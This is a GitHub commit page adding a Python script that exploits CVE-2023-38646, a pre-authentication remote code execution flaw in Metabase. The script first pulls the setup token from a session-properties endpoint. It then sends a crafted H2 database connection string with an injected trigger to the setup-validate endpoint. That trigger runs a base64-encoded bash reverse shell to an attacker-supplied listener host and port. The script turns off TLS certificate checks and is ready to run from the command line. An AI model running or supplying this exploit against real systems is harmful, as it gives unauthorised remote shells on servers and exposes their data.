Create Metabase Pre-auth RCE CVE-2023-38646-revshell.py

This commit is contained in:
R0ttCyph3r 2023-10-08 17:23:22 +05:30 committed by GitHub
parent 892c68e6e7
commit 5a0ed9f85d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,95 @@
import requests
import argparse
import base64
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def get_setup_token_and_version(ip_address):
endpoint = "/api/session/properties"
url = f"{ip_address}{endpoint}"
try:
print(f"[DEBUG] Fetching setup token from {url}...")
response = requests.get(url, verify=False)
if response.status_code == 200:
data = response.json()
setup_token = data.get("setup-token")
metabase_version = data.get("version", {}).get("tag")
if setup_token is None:
print(f"[DEBUG] Setup token not found or is null for IP: {ip_address}\n")
else:
print(f"[DEBUG] Setup Token: {setup_token}")
print(f"[DEBUG] Version: {metabase_version}")
return setup_token
except requests.exceptions.RequestException as e:
print(f"[DEBUG] Exception occurred: {e}")
print(f"[DEBUG] Failed to connect to {ip_address}.\n")
def post_setup_validate(ip_address, setup_token, listener_ip, listener_port):
payload = base64.b64encode(f"bash -i >&/dev/tcp/{listener_ip}/{listener_port} 0>&1".encode()).decode()
print(f"[DEBUG] Payload = {payload}")
endpoint = "/api/setup/validate"
url = f"{ip_address}{endpoint}"
headers = {'Content-Type': 'application/json'}
data = {
"token": setup_token,
"details": {
"is_on_demand": False,
"is_full_sync": False,
"is_sample": False,
"cache_ttl": None,
"refingerprint": False,
"auto_run_queries": True,
"schedules": {},
"details": {
"db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{payload}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x",
"advanced-options": False,
"ssl": True
},
"name": "test",
"engine": "h2"
}
}
print(f"[DEBUG] Sending request to {url} with headers {headers} and data {json.dumps(data, indent=4)}")
try:
response = requests.post(url, headers=headers, json=data, verify=False)
print(f"[DEBUG] Response received: {response.text}")
if response.status_code == 200:
print(f"[DEBUG] POST to {url} successful.\n")
else:
print(f"[DEBUG] POST to {url} failed with status code: {response.status_code}\n")
except requests.exceptions.RequestException as e:
print(f"[DEBUG] Exception occurred: {e}")
print(f"[DEBUG] Failed to connect to {url}\n")
def preprocess_url(user_input):
parsed_url = urlparse(user_input)
protocol = f"{parsed_url.scheme}://" if parsed_url.scheme else "http://"
netloc = parsed_url.netloc or parsed_url.path
return protocol + netloc.rstrip('/')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Check setup token')
parser.add_argument('--rhost', type=str, help='Metabase server IP address (including http:// or https:// and port number if needed)')
parser.add_argument('--lhost', type=str, help='Listener IP address')
parser.add_argument('--lport', type=int, default=4444, help='Listener port (default is 4444)')
args = parser.parse_args()
print(f"[DEBUG] Original rhost: {args.rhost}")
args.rhost = preprocess_url(args.rhost)
print(f"[DEBUG] Preprocessed rhost: {args.rhost}")
print(f"[DEBUG] Input Arguments - rhost: {args.rhost}, lhost: {args.lhost}, lport: {args.lport}")
setup_token = get_setup_token_and_version(args.rhost)
print(f"[DEBUG] Setup token: {setup_token}")
if setup_token:
post_setup_validate(args.rhost, setup_token, args.lhost, args.lport)